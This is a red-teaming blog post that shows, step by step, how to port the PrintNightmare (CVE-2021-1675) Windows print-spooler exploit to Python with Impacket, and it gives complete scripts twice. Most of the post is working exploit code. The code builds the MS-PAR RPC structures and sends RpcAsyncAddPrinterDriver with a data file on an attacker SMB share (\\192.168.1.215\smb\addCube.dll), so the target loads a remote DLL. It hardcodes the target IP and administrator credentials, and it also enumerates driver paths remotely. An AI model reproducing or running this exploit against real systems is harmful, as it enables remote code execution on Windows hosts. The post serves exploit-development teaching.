Red Teaming
cube0x0,
Aug 13
2021
Today, we're going to take a deep dive into pentesting and exploitation tool development using Impacket.
So what is Impacket? Impacket was originally created by Core Security Technologies (@agsolino Loading Preview... Loading Preview...
As a demonstration of how to communicate with Windows protocols and porting an exploit from scratch with the module, let’s port the PrintNightmare Loading Preview... Loading Preview... Loading Preview...
We'll start by inspecting the code in PrintNightmare. At the beginning of the code in POC.cpp, we see that a handle is created with the CreateBindingHandle function. If we look at what the function does we see that it binds to the RPC UUID 12345678-1234-abcd-ef00-0123456789ab, which we can look up here Loading Preview... Loading Preview...
// Compose an RPC string binding over TCP/IP ("ncacn_ip_tcp") for the host in dc_ip.
// The UUID string is passed as the first argument; the result is written to StringBinding.
status = RpcStringBindingComposeW((RPC_WSTR)L"12345678-1234-abcd-ef00-0123456789ab", (RPC_WSTR)L"ncacn_ip_tcp",
(RPC_WSTR)dc_ip, NULL, nullptr, &StringBinding);
Both MS-RPRN Loading Preview... Loading Preview... Loading Preview... Loading Preview...
Returning to POC.cpp, we see that after a handle is created, it then creates a DRIVER_INFO_2 Loading Preview... Loading Preview...
// Driver description: version 3, x64 environment, with pDataFile taken from src_exp_path.
DRIVER_INFO_2 info;
info.cVersion = 3;
info.pConfigFile = (LPWSTR)L"C:\\Windows\\System32\\kernelbase.dll";
info.pDataFile = src_exp_path;
info.pDriverPath = (LPWSTR)L"C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL";
info.pEnvironment = (LPWSTR)L"Windows x64";
info.pName = (LPWSTR)L"123";
// Wrap the driver description in a level-2 container, copying each field from `info`.
DRIVER_CONTAINER container_info;
container_info.Level = 2;
container_info.DriverInfo.Level2 = new DRIVER_INFO_2();
// cVersion is written as a literal here; it matches the value assigned to info.cVersion.
container_info.DriverInfo.Level2->cVersion = 3;
container_info.DriverInfo.Level2->pConfigFile = info.pConfigFile;
container_info.DriverInfo.Level2->pDataFile = info.pDataFile;
container_info.DriverInfo.Level2->pDriverPath = info.pDriverPath;
container_info.DriverInfo.Level2->pEnvironment = info.pEnvironment;
container_info.DriverInfo.Level2->pName = info.pName;
We'll need to re-create both of these structures in Impacket. DRIVER_INFO_2 is a basic NDR Structure, but DRIVER_CONTAINER is an NDR Union Structure, so we'll have to process the driver_container through it. Impacket has implemented the NDR Constructed Data Types as defined by C706 - Transfer Syntax NDR Loading Preview... Loading Preview... Loading Preview... Loading Preview... Loading Preview...
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
    """NDR structure holding a driver version followed by five LPWSTR fields."""

    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
    )
class PDRIVER_INFO_2(NDRPOINTER):
    """NDR pointer whose referent is a DRIVER_INFO_2 structure."""

    referent = (('Data', DRIVER_INFO_2),)
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
    """Union selected by ``tag``; only the level-2 arm is declared here."""

    commonHdr = (('tag', ULONG),)

    # tag value -> (field name, field type)
    union = {2: ('Level2', PDRIVER_INFO_2)}
class DRIVER_CONTAINER(NDRSTRUCT):
    """NDR structure pairing an information level with the driver-info union."""

    structure = (
        ('Level', DWORD),
        ('DriverInfo', DRIVER_INFO_UNION),
    )
When all the Structures have been created in Impacket, we can move on in POC.cpp and see that the RpcAddPrinterDriverEx method is called next, which in MS-PAR is named RpcAsyncAddPrinterDriver Loading Preview...
// Call RpcAddPrinterDriverEx on the bound handle with dc_path and the driver container.
// The flags combine APD_COPY_ALL_FILES with the raw bits 0x10 and 0x8000, which the flag
// table later in this article lists as APD_COPY_FROM_DIRECTORY and APD_INSTALL_WARNED_DRIVER.
DWORD hr = RpcAddPrinterDriverEx(handle,
dc_path,
&container_info,
APD_COPY_ALL_FILES | 0x10 | 0x8000
);
To implement RPC Interface methods in Impacket we need to add all the parameters to an NDRCALL class that matches the ins, the outs, and the input type. Methods of protocols that are built on top of MS-RPCE could ask for the [in] handle_t hRemoteBinding parameter but the MS-RPCE implementation in Impacket is created in such a way so that the parameter does not need to be manually specified. All NDRCALL functions in Impacket have two classes; a request class, and a response class. The response class is automatically called here Loading Preview...
The input types for this case are based on the MS-DTYP data typeset and can be found in dtypes.py Loading Preview...
# 3.1.4.2.2 RpcAsyncAddPrinterDriver (Opnum 39)
class RpcAsyncAddPrinterDriver(NDRCALL):
    """Request for opnum 39: pName, the driver container and dwFileCopyFlags."""

    opnum = 39
    structure = (
        ('pName', LPWSTR),
        ('pDriverContainer', DRIVER_CONTAINER),
        ('dwFileCopyFlags', DWORD),
    )
class RpcAsyncAddPrinterDriverResponse(NDRCALL):
    """Response to RpcAsyncAddPrinterDriver; its only field is the error code."""

    structure = (('ErrorCode', ULONG),)
Before calling the method we need to collect the Flags Loading Preview...
# 3.1.4.4.8 dwFileCopyFlags Values
# Each flag is a single bit; the hex value is repeated in the trailing comment.
APD_STRICT_UPGRADE = 1 << 0                # 0x00000001
APD_STRICT_DOWNGRADE = 1 << 1              # 0x00000002
APD_COPY_ALL_FILES = 1 << 2                # 0x00000004
APD_COPY_NEW_FILES = 1 << 3                # 0x00000008
APD_COPY_FROM_DIRECTORY = 1 << 4           # 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 1 << 12   # 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 1 << 13         # 0x00002000
APD_INSTALL_WARNED_DRIVER = 1 << 15        # 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 1 << 16  # 0x00010000
Now we can start constructing our requests. Strings must be null-terminated, which means that every string must end with \x00.
# Build the driver container; the union tag must be set before the Level2 arm is used.
pDriverContainer = DRIVER_CONTAINER()
pDriverContainer['Level'] = 2
pDriverContainer['DriverInfo']['tag'] = 2

# Fill the level-2 record. Every string carries an explicit \x00 terminator.
level2 = pDriverContainer['DriverInfo']['Level2']
level2['cVersion'] = 3
level2['pName'] = "1234\x00"
level2['pEnvironment'] = "Windows x64\x00"
level2['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
level2['pDataFile'] = "\\??\\UNC\\192.168.1.215\\smb\\addCube.dll\x00"
level2['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"

# Same value as APD_COPY_ALL_FILES | 0x10 | 0x8000, spelled with the named flags.
dwFileCopyFlags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
pName = NULL

# Assemble the RpcAsyncAddPrinterDriver request from the values above.
request = RpcAsyncAddPrinterDriver()
request['pName'] = pName
request['pDriverContainer'] = pDriverContainer
request['dwFileCopyFlags'] = dwFileCopyFlags
Impacket requires a DCERPCSessionError class in __main__; if we skip this in our RPC protocol implementation, we will not be able to parse any error response.
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
    """DCERPC exception whose text includes the Windows error name when it is known."""

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        """Return a 'PAR SessionError' message for this exception's error code."""
        code = self.error_code
        # Codes missing from the system error table get the generic message.
        if code not in system_errors.ERROR_MESSAGES:
            return 'PAR SessionError: unknown error code: 0x%x' % code
        entry = system_errors.ERROR_MESSAGES[code]
        return 'PAR SessionError: code: 0x%x - %s - %s' % (code, entry[0], entry[1])
Before creating a binding to the MS-PAR endpoint, we need to read the Client Initialization Documentation Loading Preview... Loading Preview... Loading Preview...
#UUID's
# Interface UUID with version 1.0 in binary form; used for endpoint mapping and for bind.
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
# Binary UUID passed as the second argument to the dce.request() calls in this article.
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
We can use epm.hept_map to get a string binding for the MS-PAR endpoint using the ncacn_ip_tcp protocol, which is fine for RPC. Then we can create a DCE object with DCERPCTransportFactory, set credentials, set auth_level to the level described in the documentation, connect, and then bind to the MS-PAR endpoint.
# Create binding
# Ask the endpoint mapper on the target for the MS-PAR string binding over TCP/IP.
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials(
    username="administrator",
    password="Password123!",
    domain="",
    lmhash="",
    nthash="",
)

# Set the authentication level before connecting, then bind to the MS-PAR interface.
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
With the packages fully constructed, we can now attempt to make a request. ErrorCode 0 means success.
# print request, make request and print response
request.dump()  # show the outgoing request fields before sending
# Send the call; MSRPC_UUID_WINSPOOL is supplied as the second argument of dce.request().
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()  # show the response fields; an ErrorCode of 0 means success
#!/usr/bin/python3
from impacket.dcerpc.v5 import par, rpcrt, epm
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.uuid import uuidtup_to_bin, string_to_bin
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
    """DCERPC exception whose text includes the Windows error name when it is known."""

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        """Return a 'PAR SessionError' message for this exception's error code."""
        code = self.error_code
        # Codes missing from the system error table get the generic message.
        if code not in system_errors.ERROR_MESSAGES:
            return 'PAR SessionError: unknown error code: 0x%x' % code
        entry = system_errors.ERROR_MESSAGES[code]
        return 'PAR SessionError: code: 0x%x - %s - %s' % (code, entry[0], entry[1])
#UUID's
# Interface UUID with version 1.0 in binary form; used for endpoint mapping and for bind.
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
# Binary UUID passed as the second argument to the dce.request() call in this script.
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
# 3.1.4.4.8 RpcAddPrinterDriverEx Values
# Each flag is a single bit; the hex value is repeated in the trailing comment.
APD_STRICT_UPGRADE = 1 << 0                # 0x00000001
APD_STRICT_DOWNGRADE = 1 << 1              # 0x00000002
APD_COPY_ALL_FILES = 1 << 2                # 0x00000004
APD_COPY_NEW_FILES = 1 << 3                # 0x00000008
APD_COPY_FROM_DIRECTORY = 1 << 4           # 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 1 << 12   # 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 1 << 13         # 0x00002000
APD_INSTALL_WARNED_DRIVER = 1 << 15        # 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 1 << 16  # 0x00010000
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
    """NDR structure holding a driver version followed by five LPWSTR fields."""

    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
    )
class PDRIVER_INFO_2(NDRPOINTER):
    """NDR pointer whose referent is a DRIVER_INFO_2 structure."""

    referent = (('Data', DRIVER_INFO_2),)
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
    """Union selected by ``tag``; only the level-2 arm is declared here."""

    commonHdr = (('tag', ULONG),)

    # tag value -> (field name, field type)
    union = {2: ('Level2', PDRIVER_INFO_2)}
class DRIVER_CONTAINER(NDRSTRUCT):
    """NDR structure pairing an information level with the driver-info union."""

    structure = (
        ('Level', DWORD),
        ('DriverInfo', DRIVER_INFO_UNION),
    )
# 3.1.4.2.2 RpcAsyncAddPrinterDriver (Opnum 39)
class RpcAsyncAddPrinterDriver(NDRCALL):
    """Request for opnum 39: pName, the driver container and dwFileCopyFlags."""

    opnum = 39
    structure = (
        ('pName', LPWSTR),
        ('pDriverContainer', DRIVER_CONTAINER),
        ('dwFileCopyFlags', DWORD),
    )
class RpcAsyncAddPrinterDriverResponse(NDRCALL):
    """Response to RpcAsyncAddPrinterDriver; its only field is the error code."""

    structure = (('ErrorCode', ULONG),)
# Build the driver container; the union tag must be set before the Level2 arm is used.
pDriverContainer = DRIVER_CONTAINER()
pDriverContainer['Level'] = 2
pDriverContainer['DriverInfo']['tag'] = 2

# Fill the level-2 record. Every string carries an explicit \x00 terminator.
level2 = pDriverContainer['DriverInfo']['Level2']
level2['cVersion'] = 3
level2['pName'] = "1234\x00"
level2['pEnvironment'] = "Windows x64\x00"
level2['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
level2['pDataFile'] = "\\??\\UNC\\192.168.1.215\\smb\\addCube.dll\x00"
level2['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"

# Same value as APD_COPY_ALL_FILES | 0x10 | 0x8000, spelled with the named flags.
dwFileCopyFlags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
pName = NULL

# Assemble the RpcAsyncAddPrinterDriver request from the values above.
request = RpcAsyncAddPrinterDriver()
request['pName'] = pName
request['pDriverContainer'] = pDriverContainer
request['dwFileCopyFlags'] = dwFileCopyFlags
# Create binding
# Ask the endpoint mapper on the target for the MS-PAR string binding over TCP/IP.
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials(
    username="administrator",
    password="Password123!",
    domain="",
    lmhash="",
    nthash="",
)

# Set the authentication level before connecting, then bind to the MS-PAR interface.
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
# print request, make request and print response
request.dump()  # show the outgoing request fields before sending
# Send the call; MSRPC_UUID_WINSPOOL is supplied as the second argument of dce.request().
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()  # show the response fields; an ErrorCode of 0 means success
The problem with the original PrintNightmare PoC was that the pDriverPath value was hardcoded and that the path tends to be different on different versions of Windows. To solve this issue and to enumerate driver paths remotely we can use the RpcAsyncEnumPrinterDrivers Loading Preview...
Starting with the methods, we can follow the same process as before. The opnum specified in our method must match the opnum in the Microsoft documentation, since it will be included in the request that is sent.
# 3.1.4.2.3 RpcAsyncEnumPrinterDrivers (Opnum 40)
class RpcAsyncEnumPrinterDrivers(NDRCALL):
    """Request for opnum 40: pName, pEnvironment, Level, the pDrivers buffer and cbBuf."""

    opnum = 40
    structure = (
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('Level', DWORD),
        ('pDrivers', LPBYTE),
        ('cbBuf', DWORD),
    )
class RpcAsyncEnumPrinterDriversResponse(NDRCALL):
    """Response to RpcAsyncEnumPrinterDrivers: buffer, needed size, count and error code."""

    structure = (
        ('pDrivers', LPBYTE),
        ('pcbNeeded', DWORD),
        ('pcReturned', DWORD),
        ('ErrorCode', ULONG),
    )
Now to make the request. First, we need to make a request to identify the required buffer size, and then we can obtain the printer driver data.
# Create values for function parameter value
pName = NULL
pEnvironment = NULL
Level = 2
pDrivers = NULL
cbBuf = 0

# First pass: send an empty buffer so the server reports how many bytes it needs.
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = pDrivers
request['cbBuf'] = cbBuf
try:
    resp = dce.request(request, MSRPC_UUID_WINSPOOL)
except DCERPCSessionError as e:
    # Only the "buffer too small" failure is expected here; re-raise anything else.
    if 'ERROR_INSUFFICIENT_BUFFER' not in str(e):
        raise
    bytesNeeded = e.get_packet()['pcbNeeded']
else:
    # The call succeeded with an empty buffer. Read the size from the response so
    # bytesNeeded is always defined (previously this path raised NameError below).
    bytesNeeded = resp['pcbNeeded']
print("bytesNeeded: {0}".format(bytesNeeded))

# Second pass: repeat the call with a buffer of the size the server asked for.
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = b'a' * bytesNeeded
request['cbBuf'] = bytesNeeded
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
The output from resp.dump() contains our expected return structure. pcReturned tells us how many drivers were returned, and pDrivers is a long array of bytes that we need to convert into _DRIVER_INFO_2 structures.
When parsing binary data for Windows structures we can use the Impacket class Structure. Each driver record starts with six little-endian 32-bit values (cVersion followed by five offsets), so in our structure we can use <L to automatically parse the first 6*32 bits of each driver. Then we can use the fromString function to collect the driver data between the offsets; this function is called automatically when a new instance is created with data.
class DRIVER_INFO_2_BLOB(Structure):
    """Parser for one driver record inside the returned pDrivers byte buffer.

    ``Structure`` unpacks the six little-endian 32-bit header fields.
    ``fromString`` then decodes the UTF-16LE strings that lie between
    consecutive offsets in the raw buffer.
    """

    structure = (
        ('cVersion', '<L'),
        ('NameOffset', '<L'),
        ('EnvironmentOffset', '<L'),
        ('DriverPathOffset', '<L'),
        ('DataFileOffset', '<L'),
        ('ConfigFileOffset', '<L'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self, data):
        """Unpack the header, then decode each string bounded by two offsets."""
        Structure.fromString(self, data)
        # (destination field, start-offset field, end-offset field)
        spans = (
            ('ConfigFileArray', 'ConfigFileOffset', 'DataFileOffset'),
            ('DataFileArray', 'DataFileOffset', 'DriverPathOffset'),
            ('DriverPathArray', 'DriverPathOffset', 'EnvironmentOffset'),
            ('EnvironmentArray', 'EnvironmentOffset', 'NameOffset'),
        )
        for target, start_key, end_key in spans:
            self[target] = self.rawData[self[start_key]:self[end_key]].decode('utf-16-le')
        # NOTE: the driver name (the bytes from NameOffset onward) is not decoded here.
class DRIVER_INFO_2_ARRAY(Structure):
    """Collect ``pcReturned`` DRIVER_INFO_2_BLOB records parsed from ``data``."""

    # pcReturned is the number of driver records to parse from data
    def __init__(self, data = None, pcReturned = None):
        Structure.__init__(self, data = data)
        self['drivers'] = list()
        if data is None:
            return
        cursor = data
        for _ in range(pcReturned):
            # parse one record at the current position and keep it
            record = DRIVER_INFO_2_BLOB(cursor)
            self['drivers'].append(record)
            # skip len(record) bytes to reach the next record
            cursor = cursor[len(record):]
To call the parser we can do this:
# Join the returned byte chunks into one buffer and parse pcReturned driver records.
blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
for driver in blobs['drivers']:
    driver.dump()
Full example code:
#!/usr/bin/python3
from impacket.dcerpc.v5 import par, rpcrt, epm
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.structure import Structure
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL, LPBYTE
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.uuid import uuidtup_to_bin, string_to_bin
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
class DCERPCSessionError(DCERPCException):
    """DCERPC exception whose text includes the Windows error name when it is known."""

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        """Return a 'PAR SessionError' message for this exception's error code."""
        code = self.error_code
        # Codes missing from the system error table get the generic message.
        if code not in system_errors.ERROR_MESSAGES:
            return 'PAR SessionError: unknown error code: 0x%x' % code
        entry = system_errors.ERROR_MESSAGES[code]
        return 'PAR SessionError: code: 0x%x - %s - %s' % (code, entry[0], entry[1])
#UUID's
# Interface UUID with version 1.0 in binary form; used for endpoint mapping and for bind.
MSRPC_UUID_PAR = uuidtup_to_bin(('76F03F96-CDFD-44FC-A22C-64950A001209', '1.0'))
# Binary UUID passed as the second argument to the dce.request() calls in this script.
MSRPC_UUID_WINSPOOL = string_to_bin('9940CA8E-512F-4C58-88A9-61098D6896BD')
# Create binding
# Ask the endpoint mapper on the target for the MS-PAR string binding over TCP/IP.
stringbinding = epm.hept_map("192.168.1.10", MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials(
    username="administrator",
    password="Password123!",
    domain="",
    lmhash="",
    nthash="",
)

# Set the authentication level before connecting, then bind to the MS-PAR interface.
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PAR)
#enum
# 3.1.4.2.3 RpcAsyncEnumPrinterDrivers (Opnum 40)
class RpcAsyncEnumPrinterDrivers(NDRCALL):
    """Request for opnum 40: pName, pEnvironment, Level, the pDrivers buffer and cbBuf."""

    opnum = 40
    structure = (
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('Level', DWORD),
        ('pDrivers', LPBYTE),
        ('cbBuf', DWORD),
    )
class RpcAsyncEnumPrinterDriversResponse(NDRCALL):
    """Response to RpcAsyncEnumPrinterDrivers: buffer, needed size, count and error code."""

    structure = (
        ('pDrivers', LPBYTE),
        ('pcbNeeded', DWORD),
        ('pcReturned', DWORD),
        ('ErrorCode', ULONG),
    )
# Create values for function parameter value
pName = NULL
pEnvironment = NULL
Level = 2
pDrivers = NULL
cbBuf = 0

# First pass: send an empty buffer so the server reports how many bytes it needs.
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = pDrivers
request['cbBuf'] = cbBuf
try:
    resp = dce.request(request, MSRPC_UUID_WINSPOOL)
except DCERPCSessionError as e:
    # Only the "buffer too small" failure is expected here; re-raise anything else.
    if 'ERROR_INSUFFICIENT_BUFFER' not in str(e):
        raise
    bytesNeeded = e.get_packet()['pcbNeeded']
else:
    # The call succeeded with an empty buffer. Read the size from the response so
    # bytesNeeded is always defined (previously this path raised NameError below).
    bytesNeeded = resp['pcbNeeded']
print("bytesNeeded: {0}".format(bytesNeeded))

# Second pass: repeat the call with a buffer of the size the server asked for.
request = RpcAsyncEnumPrinterDrivers()
request['pName'] = pName
request['pEnvironment'] = pEnvironment
request['Level'] = Level
request['pDrivers'] = b'a' * bytesNeeded
request['cbBuf'] = bytesNeeded
request.dump()
resp = dce.request(request, MSRPC_UUID_WINSPOOL)
resp.dump()
class DRIVER_INFO_2_BLOB(Structure):
    """Parser for one driver record inside the returned pDrivers byte buffer.

    ``Structure`` unpacks the six little-endian 32-bit header fields.
    ``fromString`` then decodes the UTF-16LE strings that lie between
    consecutive offsets in the raw buffer.
    """

    structure = (
        ('cVersion', '<L'),
        ('NameOffset', '<L'),
        ('EnvironmentOffset', '<L'),
        ('DriverPathOffset', '<L'),
        ('DataFileOffset', '<L'),
        ('ConfigFileOffset', '<L'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self, data):
        """Unpack the header, then decode each string bounded by two offsets."""
        Structure.fromString(self, data)
        # (destination field, start-offset field, end-offset field)
        spans = (
            ('ConfigFileArray', 'ConfigFileOffset', 'DataFileOffset'),
            ('DataFileArray', 'DataFileOffset', 'DriverPathOffset'),
            ('DriverPathArray', 'DriverPathOffset', 'EnvironmentOffset'),
            ('EnvironmentArray', 'EnvironmentOffset', 'NameOffset'),
        )
        for target, start_key, end_key in spans:
            self[target] = self.rawData[self[start_key]:self[end_key]].decode('utf-16-le')
        # NOTE: the driver name (the bytes from NameOffset onward) is not decoded here.
class DRIVER_INFO_2_ARRAY(Structure):
    """Collect ``pcReturned`` DRIVER_INFO_2_BLOB records parsed from ``data``."""

    def __init__(self, data = None, pcReturned = None):
        Structure.__init__(self, data = data)
        self['drivers'] = list()
        if data is None:
            return
        cursor = data
        for _ in range(pcReturned):
            # parse one record at the current position and keep it
            record = DRIVER_INFO_2_BLOB(cursor)
            self['drivers'].append(record)
            # skip len(record) bytes to reach the next record
            cursor = cursor[len(record):]
# Join the returned byte chunks into one buffer and parse pcReturned driver records.
blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
for driver in blobs['drivers']:
    driver.dump()
The full exploit code is available at https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py
Many thanks to @agsolino Loading Preview... Loading Preview...